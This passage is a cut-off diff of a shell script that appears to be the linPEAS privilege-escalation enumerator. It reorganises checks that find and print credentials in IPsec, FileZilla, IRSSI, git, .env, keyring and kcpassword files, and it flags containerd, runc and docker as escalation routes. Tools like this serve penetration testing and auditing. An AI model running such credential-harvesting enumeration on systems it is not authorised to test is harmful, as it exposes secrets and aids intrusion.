\"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gvm-tools.conf"; fi; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing IPSec Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then echo_not_found "ipsec.secrets"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then echo_not_found "ipsec.conf"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_IPSEC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing IPSec Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.secrets"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.conf"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing IRSSI Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then echo_not_found ".irssi"; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; for ff in $(find "$f" -name "config"); do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_IRSSI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing IRSSI Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".irssi"; fi; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; +fi - print_2title "Analyzing Keyring Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then echo_not_found "keyrings"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then echo_not_found "*.keyring"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then echo_not_found "*.keystore"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then echo_not_found "*.jks"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_KEYRING" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Keyring Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keyrings"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keyring"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keystore"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.jks"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; +fi - print_2title "Analyzing Filezilla Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then echo_not_found "filezilla"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then echo_not_found "filezilla.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_FILEZILLA" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Filezilla Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; find "$f" -name "sitemanager.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; +fi - print_2title "Analyzing Backup Manager Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then echo_not_found "storage.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then echo_not_found "database.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_BACKUP_MANAGER" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Backup Manager Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "database.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; +fi - ##-- SI) passwd files (splunk) +##-- SI) passwd files (splunk) +SPLUNK_BIN="$(command -v splunk 2>/dev/null)" +if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then print_2title "Searching uncommon passwd files (splunk)" - SPLUNK_BIN="$(command -v splunk 2>/dev/null)" if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do if [ -f "$f" ] && ! [ -x "$f" ]; then @@ -2878,16 +3005,22 @@ if echo $CHECKS | grep -q SofI; then fi done echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi +if [ "$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then print_2title "Analyzing kcpassword files" print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" - printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do + printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do echo "$f" | sed -${E} "s,.*,${SED_RED}," base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," done echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - ##-- SI) Gitlab +##-- SI) Gitlab +if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then print_2title "Searching GitLab related files" #Check gitlab-rails if [ "$(command -v gitlab-rails)" ]; then @@ -2917,56 +3050,75 @@ if echo $CHECKS | grep -q SofI; then echo "" done echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - print_2title "Analyzing Github Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then echo_not_found ".github"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then echo_not_found ".gitconfig"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then echo_not_found ".git-credentials"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then echo_not_found ".git"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_GITHUB" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Github Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".github"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; +fi - print_2title "Analyzing Svn Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then echo_not_found ".svn"; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; +if [ "$PSTORAGE_SVN" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Svn Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".svn"; fi; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; +fi - print_2title "Analyzing PGP-GPG Files (limit 70)" +if [ "$PSTORAGE_PGP_GPG" ] || [ "$DEBUG" ]; then + print_2title "Analyzing PGP-GPG Files (limit 70)" ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null (command -v netpgp || echo_not_found "netpgp") 2>/dev/null - if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then echo_not_found "*.pgp"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then echo_not_found "*.gpg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then echo_not_found "*.gnupg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pgp"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gnupg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi - print_2title "Analyzing Cache Vi Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then echo_not_found "*.swp"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then echo_not_found "*.viminfo"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_CACHE_VI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cache Vi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.swp"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.viminfo"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; +fi - print_2title "Analyzing Wget Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then echo_not_found ".wgetrc"; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_WGET" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Wget Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".wgetrc"; fi; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; +fi - ##-- SI) containerd installed +##-- SI) containerd installed +containerd=$(command -v ctr) +if [ "$containerd" ] || [ "$DEBUG" ]; then print_2title "Checking if containerd(ctr) is available" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - containerd=$(command -v ctr) if [ "$containerd" ]; then echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," ctr image list fi echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - ##-- SI) runc installed +##-- SI) runc installed +runc=$(command -v runc) +if [ "$runc" ] || [ "$DEBUG" ]; then print_2title "Checking if runc is available" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - runc=$(command -v runc) if [ "$runc" ]; then echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," fi echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - #-- SI) Docker +#-- SI) Docker +if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then print_2title "Searching docker files (limit 70)" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do @@ -2976,425 +3128,508 @@ if echo $CHECKS | grep -q SofI; then fi done echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - print_2title "Analyzing Firefox Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then echo_not_found "Firefox"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - - - print_2title "Analyzing Chrome Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then echo_not_found "google-chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then echo_not_found "Chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - - - print_2title "Analyzing Autologin Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then echo_not_found "autologin"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then echo_not_found "autologin.conf"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - - - #-- SI) S/Key athentication - print_2title "S/Key authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then - printf "System supports$RED S/Key$NC authentication\n" - if ! [ -d /etc/skey/ ]; then - echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then - echo "${RED}/etc/skey/ is writable by you" - ls -ld /etc/skey/ - else - ls -ld /etc/skey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) YubiKey athentication - print_2title "YubiKey authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then - printf "System supports$RED YubiKey$NC authentication\n" - if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then - echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ - else - ls -ld /var/db/yubikey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) Passwords inside pam.d - print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," - echo "" - - - - print_2title "Analyzing SNMP Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then echo_not_found "snmpd.conf"; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Pypirc Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then echo_not_found ".pypirc"; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Postfix Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then echo_not_found "postfix"; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; for ff in $(find "$f" -name "master.cf"); do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Ldaprc Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then echo_not_found ".ldaprc"; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Env Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then echo_not_found ".env"; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Msmtprc Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then echo_not_found ".msmtprc"; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | 